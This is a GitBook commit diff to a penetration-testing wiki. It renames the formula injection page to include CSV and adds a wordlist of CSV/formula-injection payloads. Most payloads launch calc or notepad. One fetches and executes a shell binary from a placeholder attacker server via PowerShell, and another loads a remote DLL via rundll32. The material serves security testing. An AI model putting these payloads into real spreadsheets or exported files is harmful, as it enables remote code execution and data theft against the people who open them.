GitBook: [#3521] No subject

SUMMARY.md

@@ -476,7 +476,7 @@
   * [LFI2RCE Via compress.zlib + PHP\_STREAM\_PREFER\_STUDIO + Path Disclosure](pentesting-web/file-inclusion/lfi2rce-via-compress.zlib-+-php\_stream\_prefer\_studio-+-path-disclosure.md)
 * [File Upload](pentesting-web/file-upload/README.md)
   * [PDF Upload - XXE and CORS bypass](pentesting-web/file-upload/pdf-upload-xxe-and-cors-bypass.md)
-* [Formula/Doc/LaTeX Injection](pentesting-web/formula-doc-latex-injection.md)
+* [Formula/CSV/Doc/LaTeX Injection](pentesting-web/formula-doc-latex-injection.md)
 * [HTTP Connection Request Smuggling](pentesting-web/http-connection-request-smuggling.md)
 * [HTTP Request Smuggling / HTTP Desync Attack](pentesting-web/http-request-smuggling/README.md)
   * [Browser HTTP Request Smuggling](pentesting-web/http-request-smuggling/browser-http-request-smuggling.md)

pentesting-web/formula-doc-latex-injection.md

@@ -1,4 +1,4 @@
-# Formula/Doc/LaTeX Injection
+# Formula/CSV/Doc/LaTeX Injection
 
 <details>
 
@@ -22,6 +22,17 @@ If your **input** is being **reflected** inside **CSV file**s (or any other file
 Nowadays **Excel will alert** (several times) the **user when something is loaded from outside the Excel** in order to prevent him to from malicious action. Therefore, special effort on Social Engineering must be applied to he final payload.
 {% endhint %}
 
+### [Wordlist](https://github.com/payloadbox/csv-injection-payloads)
+
+```
+DDE ("cmd";"/C calc";"!A0")A0
+@SUM(1+9)*cmd|' /C calc'!A0
+=10+20+cmd|' /C calc'!A0
+=cmd|' /C notepad'!'A1'
+=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0
+=cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1
+```
+
 ### Hyperlink
 
 **The following example is very useful to exfiltrate content from the final excel sheet and to perform requests to arbitrary locations. But it requires the use to click on the link (and accept the warning prompts).**